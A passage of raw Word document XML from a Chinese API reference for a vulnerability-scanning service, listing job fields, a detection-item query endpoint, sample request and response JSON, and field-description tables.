          <w:p w14:paraId="0D793B96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EEF8F2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4754BF90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0690D1CA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251126E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E0D450E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E1EF037" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F26EC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行状态; 0：未开始执行，1：排队执行，2：正在执行，3：执行成功，4：执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CCCF1C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="_Toc115166197"/>
      <w:bookmarkStart w:id="246" w:name="作业下检测项信息查询"/>
      <w:bookmarkEnd w:id="244"/>
      <w:r>
        <w:t>作业下检测项信息查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p w14:paraId="5D640608" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6148374C"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tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E4902"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74"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="62D0963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9C3A8DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72323000" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A686AA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42DE654F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="771F4DA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F34781" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0AE420" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56320B97" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E15EB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28FA81B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D4F4C62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必传，作业类型：1：全局作业 2：用户作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58F37E57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042AB52"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tasks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"4d6d38c4b39831f3c74e","jobType":1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B328DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3318A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "1756c4dc8f66365e3cb6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042018000053",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "params": {},</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeTypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>permitExecuteTypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>timlong's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test notice22",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeSeverityTip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>timlong's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>脚本风险描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeSeverity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1545184060,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inputSchemas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "field": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "请求",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "caption": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wqw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "required": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defaultValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F456FE6"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2124"/>
        <w:gridCol w:w="2085"/>
        <w:gridCol w:w="1924"/>
        <w:gridCol w:w="3949"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CEA5FF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5E28AFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFB1435" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5142F850" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="113D04B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65C1E3A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7670096D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4326891E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38671ABE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6679B281" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>task id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35A5ABBA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A46F02E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E78FA3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3224D4B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A0179AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="422A4BDF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FB9DC28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="083FBF5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>String,Object</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="109CAADA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="655327CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>输入参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FD5917A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BAD7B88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79690238" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C871B40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="762D384B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测方式，1：版本对比 2：POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03A46CF4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3AD573" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>permitExecuteTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F1B9EB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31A43808" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>BoInteger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>olean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0406602E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>允许的检测方式，1：版本对比 2：POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="79974579" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F46E82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D404EF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4722161F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01B78C8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测项名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="221C2DDB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B512DC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34559DE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5396AD3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5680B13C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测项类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F3DB967" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E17E2FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeSeverityTip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="656B8867" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="695CD3B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29334729" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测脚本执行风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1AAF3857" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
